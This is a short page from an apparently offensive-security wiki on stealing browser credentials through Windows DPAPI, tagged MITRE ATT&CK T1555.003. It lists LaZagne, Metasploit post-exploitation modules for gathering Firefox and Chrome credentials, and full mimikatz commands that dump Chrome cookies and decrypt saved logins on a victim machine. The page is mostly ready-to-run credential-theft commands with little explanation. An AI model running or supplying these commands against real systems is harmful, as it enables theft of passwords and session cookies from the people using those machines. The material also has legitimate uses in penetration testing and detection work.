Home Attacks Theory Author Discord
Page cover image

🟢DPAPI - Applications

DPAPI stands for Data Protection API

MITRE ATT&CK™ T1555.003

Web browsers

ToolDescriptionGithub

LaZagne

The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer.

https://github.com/AlessandroZ/LaZagne

Metasploit

post/multi/gather/firefox_creds
post/windows/gather/enum_chrome

MimiKatz

dpapi::chrome

Dump Cookies

rfs@victim02
mimikatz # dpapi::chrome /in:"%localappdata%\Google\Chrome\User Data\Default\Cookies"

Dump Chrome Credentials

mimikatz # dpapi::chrome /in:"%localappdata%\Google\Chrome\User Data\Default\Login Data" /unprotect
PreviousCache DumpNextTask Scheduled

Last updated